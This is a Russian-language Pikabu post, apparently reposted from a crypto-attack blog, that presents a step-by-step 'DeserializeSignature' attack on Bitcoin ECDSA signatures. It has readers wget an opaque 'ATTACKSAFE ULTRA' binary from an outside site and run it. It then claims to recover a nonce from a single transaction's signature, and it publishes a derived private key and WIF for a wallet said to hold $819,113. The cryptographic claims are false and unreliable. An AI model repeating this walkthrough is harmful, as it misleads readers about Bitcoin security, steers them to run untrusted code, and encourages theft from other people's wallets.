Кроме того, уязвимость DeserializeSignature имеет более непосредственные последствия для безопасности пользователей, так как она может быть использована для выполнения произвольного кода и компрометации системы. В то время как уязвимости в ECDSA и P2P-сети могут требовать более сложных атак и имеют более косвенные последствия. В последние годы криптовалюты, такие как Bitcoin, стали важной частью финансовой экосистемы. Однако, с ростом их популярности, увеличивается и количество выявленных уязвимостей.

Поддельные подписи ECDSA

https://github.com/demining/Deserialize-Signature-Vulnerability-in-Bitcoin-Network

Создания недействительных подписей ECDSA с помощью процесса машинного обучение BitcoinChatGPT

Рассмотрим построение структуры уязвимой Raw транзакции в котором используется модуль BitcoinChatGPT

Откроем версию Google Colab:

https://colab.research.google.com/drive/1-3WyUqipb1pXrlDjg4jxtMOG6J3MU3sa#scrollTo=B8ueObMAt5Q9&line=1&uniqifier=1

Соединим все выданные значение в одну общую строку:

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b483045022100b44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307022074e5feb333400732256fc44a681a1ba262b080a7cc5dfa11894e7ce4d9766c6f0141045cf7dd1ad49af6957415d6b76ff39cbf78f6e72f1db9199a01127687e7230f96614ff6f0184d2191fa7428872e311fe4ddf2b91f560b30fd7dc01d2118ac0b5bffffffff01d2040000000000001976a914d74b32dfa340da479ce64aaf5e326496eb3995f188ac00000000

Откроем опцию от BlockCypher

“Decode A Transaction”:

https://live.blockcypher.com/btc/decodetx

После декодирование уязвимой Raw транзакции Биткоина мы получаем результат:

Обратим внимание на Bitcoin HASH160: d74b32dfa340da479ce64aaf5e326496eb3995f1

https://github.com/demining/CryptoDeepTools/blob/f0421962be80403bb1b0877eace2c7eb70eb85bd/32DeserializeSignatureVulnerability/DecodeRawTX.txt#L31

BitcoinChatGPT создает структуру транзакции, используя HASH публичного ключа, где мы видим что Bitcoin address: 1LdNN9GXmoKZs5vrQFL1d4NL9GgZ1PfCZk отправляет 1234 satoshi на тот же адрес внутри своей сети.

Bitcoin HASH160 был получен с помощью Python Script: wif_to_hash160.py

VulnerableRawTX.txt

https://github.com/demining/CryptoDeepTools/blob/main/32DeserializeSignatureVulnerability/wif_to_hash160.py

Вопрос – Ответ:

В конечном итоге модуль BitcoinChatGPT выдает ответ в файл: KEYFOUND.privkey сохранив приватный ключ в двух наиболее используемых форматах HEX & WIF

https://github.com/demining/CryptoDeepTools/blob/main/32DeserializeSignatureVulnerability/KEYFOUND.privkey

BitcoinChatGPT №2 DeserializeSignature Vulnerability Algorithm

Практическая частьЧтобы перейти к практической части создадим из полученных данных уязвимую Raw транзакцию используя репозиторию Broadcast Bitcoin Transaction

Скачаем и установим исходный код откроем терминал и запустим команду:

git clone https://github.com/smartiden/Broadcast-Bitcoin-Transaction.g...

Каталог:

cd Broadcast-Bitcoin-Transaction

Установим три важные библиотеки:

  • zmq

  • urllib3

  • requests

<a href="https://pikabu.ru/story/uyazvimost_deserializesignature_v_seti_bitkoin_kriptoanaliz_posledstviya_i_vozmozhnost_sozdaniya_nedeystvitelnyikh_podpisey_ecdsa_11454555?u=https%3A%2F%2Fgithub.com%2Fsmartiden%2FBroadcast-Bitcoin-Transaction%2Fblob%2Fmain%2Frequirements.txt&t=requirements.txt&h=d1241bc0cc60c97d768f6f737c2582165e2e0d6c" title="https://github.com/smartiden/Broadcast-Bitcoin-Transaction/blob/main/requirements.txt" target="_blank" rel="nofollow noopener">requirements.txt</a>

requirements.txt

Запустим команду:

pip install -r requirements.txt

Откроем в Notepad++ основной файл и несем небольшие изменение в коде Python Script: main.py

Порядок выполнения действий на видео:

Как нам известно из prompt ответов модуля BitcoinChatGPT aлгоритм для выявление уязвимости DeserializeSignature может быть использован для нескольких вариантов решения сложных криптографических задач.

Раскрытие секретного ключа “K” (NONCE) в блокчейне Биткоина

https://colab.research.google.com/drive/1EiIIJh8UCOZZ8DVbelxhESFPvqu_xZUo

Откроем [GoogleColab]

Реализуем алгоритм с помощью нашей репозитории 32DeserializeSignatureVulnerability

!git clone https://github.com/demining/CryptoDeepTools.git

cd CryptoDeepTools/32DeserializeSignatureVulnerability/

ls

Подготовим RawTX для атаки

Теперь нам нужно получить все значение R, S, Z из всех уязвимых транзакции

Воспользуемся сервисом: https://attacksafe.ru/RSZ-Signature-From-Tx

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b483045022100b44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307022074e5feb333400732256fc44a681a1ba262b080a7cc5dfa11894e7ce4d9766c6f0141045cf7dd1ad49af6957415d6b76ff39cbf78f6e72f1db9199a01127687e7230f96614ff6f0184d2191fa7428872e311fe4ddf2b91f560b30fd7dc01d2118ac0b5bffffffff01d2040000000000001976a914d74b32dfa340da479ce64aaf5e326496eb3995f188ac00000000

<a href="https://pikabu.ru/story/uyazvimost_deserializesignature_v_seti_bitkoin_kriptoanaliz_posledstviya_i_vozmozhnost_sozdaniya_nedeystvitelnyikh_podpisey_ecdsa_11454555?u=https%3A%2F%2Fattacksafe.ru%2FRSZ-Signature-From-Tx&t=RSZ-Signature-From-Tx&h=4cded437460e09788fd7b4ff9ce7f5f1f36a24c9" title="https://attacksafe.ru/RSZ-Signature-From-Tx" target="_blank" rel="nofollow noopener">RSZ-Signature-From-Tx</a>

RSZ-Signature-From-Tx

R = 0xb44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307 S = 0x74e5feb333400732256fc44a681a1ba262b080a7cc5dfa11894e7ce4d9766c6f Z = 0xa79974cb42f82890fcebcb9865cd512a34479d91211e2ce383def10a7388cf63

Чтобы реализовать атаку и получить секретный ключ мы воспользуемся программным обеспечение “ATTACKSAFE ULTRA”

<!--noindex--><a href="https://pikabu.ru/story/uyazvimost_deserializesignature_v_seti_bitkoin_kriptoanaliz_posledstviya_i_vozmozhnost_sozdaniya_nedeystvitelnyikh_podpisey_ecdsa_11454555?u=http%3A%2F%2Fwww.attacksafe.ru%2Fultra&t=www.attacksafe.ru%2Fultra&h=60790e0b6cf268a7890bf70ecea8d1d10e4cd29a" title="http://www.attacksafe.ru/ultra" target="_blank" rel="nofollow noopener">www.attacksafe.ru/ultra</a><!--/noindex-->

www.attacksafe.ru/ultra

Для необходимых пакетов библиотек для запуска программного обеспечение “ATTAKSAFE ULTRA” установим “SAGE MATH”

Команда установки:

!sudo apt-get update

!sudo apt-get install -y python3-gmpy2

!sudo apt-get install sagemath

!sage -v

С помощью утилиты wget загрузим в папку Google Colab репозитории ATTACKSAFE_ULTRA.zip

!wget https://attacksafe.ru/REPOSITORY/DC66398E76DBCD8193134381D78...

Разархивируем репозитории ATTACKSAFE_ULTRA.zip

!unzip ATTACKSAFE_ULTRA.zip

ls

!./attacksafe -help

!./attacksafe -version

Запустим список всех скриптов для атак:

!./attacksafe -ultra

Запустим deserialization_error_vulnerability_cve-2023-0085.sage используя программное обеспечение “ATTACKSAFE ULTRA”

!./attacksafe deserialization_error_vulnerability_cve-2023-0085.sage -open RawTX.txt -save SecretKey.txt

Мы запустили данную атаку из deserialization_error_vulnerability_cve-2023-0085.sage и результат сохранился в файл SecretKey.txt

Теперь чтобы посмотреть успешный результат откроем файл SecretKey.txt

cat SecretKey.txt

Deployments ECDSA: SecretKey = 0x2863763e8ec6bf755cc152e5080e7c74a95295f06cfbe86d9cb7c37f28f1013c

RawTX = 01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b483045022100b44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307022074e5feb333400732256fc44a681a1ba262b080a7cc5dfa11894e7ce4d9766c6f0141045cf7dd1ad49af6957415d6b76ff39cbf78f6e72f1db9199a01127687e7230f96614ff6f0184d2191fa7428872e311fe4ddf2b91f560b30fd7dc01d2118ac0b5bffffffff01d2040000000000001976a914d74b32dfa340da479ce64aaf5e326496eb3995f188ac00000000

Мы видим надпись "Deployments ECDSA" это означает критическую уязвимость транзакции блокчейна Биткоина

SecretKey значение в формате HEX, это и есть наш секретный ключ "K" (NONCE):

K = 0x2863763e8ec6bf755cc152e5080e7c74a95295f06cfbe86d9cb7c37f28f1013c

Сделаем проверку с помощью Python-скрипта point2gen.py

Для этого установим библиотеку эллиптических кривых ECPy:

!pip3 install ECPy

Теперь запустим скрипт указав секретный ключ "K" (NONCE):

!python3 point2gen.py 0x2863763e8ec6bf755cc152e5080e7c74a95295f06cfbe86d9cb7c37f28f1013c

(0xb44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307 , 0x3adecc9efffbb36322c8e19071e323815403be263c1e595dc26eb762982b54b0)

Проверяем координаты точки EC (secp256k1) с значением сигнатуры R

R = 0xb44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307

S = 0x74e5feb333400732256fc44a681a1ba262b080a7cc5dfa11894e7ce4d9766c6f

Z = 0xa79974cb42f82890fcebcb9865cd512a34479d91211e2ce383def10a7388cf63

R = 0xb44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307

point2gen = (0xb44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307 , 0x3adecc9efffbb36322c8e19071e323815403be263c1e595dc26eb762982b54b0)

ВСЕ ВЕРНО!

K = 0x2863763e8ec6bf755cc152e5080e7c74a95295f06cfbe86d9cb7c37f28f1013c

Теперь зная секретный ключ мы можем получить приватный ключ к Биткоин Кошельку: 1LdNN9GXmoKZs5vrQFL1d4NL9GgZ1PfCZk

Воспользуемся Python-скриптом: calculate.py > > > Получим Приватный Ключ

Откроем код и добавим все значение сигнатур K, R, S, Z

Скрипт calculate.py рассчитает приватный ключ по формуле:

Privkey = ((((S * K) - Z) * modinv(R,N)) % N)

Запустим скрипт:

PrivKey = 0506b0b7b508625dc7b0623db41206c48058ede0a9c75ff265eeb47fea29b3f0

Откроем bitaddress и проверим:

ADDR: 1LdNN9GXmoKZs5vrQFL1d4NL9GgZ1PfCZk WIF: 5HrVy4SVvC46tsuBhMhVEGHXG4AzhxtEqi4FLbia5vAXuF5GwaX HEX: 0506b0b7b508625dc7b0623db41206c48058ede0a9c75ff265eeb47fea29b3f0

https://btc1.trezor.io/address/1LdNN9GXmoKZs5vrQFL1d4NL9GgZ1PfCZk

Приватный Ключ Получен!

https://btc1.trezor.io/address/1LdNN9GXmoKZs5vrQFL1d4NL9GgZ1PfCZk

BALANCE: $ 819113

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Исходный код

Google Colab

ATTACKSAFE ULTRA

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/8E2KJeWu4XA

Dzen Video Tutorial: https://dzen.ru/video/watch/664e34fc8df6514b10da09e9

Источник: https://cryptodeep.ru/deserialize-signature-vulnerability-bitcoin

Показать полностью 21 3
Биткоины Криптовалюта Хакеры Заработок в интернете Заработок Арбитраж криптовалюты Видео YouTube Telegram (ссылка) Яндекс Дзен (ссылка) YouTube (ссылка) Длиннопост
0
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Маркет Промокоды Пятерочка Промокоды Aroma Butik Промокоды Яндекс Путешествия Промокоды Яндекс Еда Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии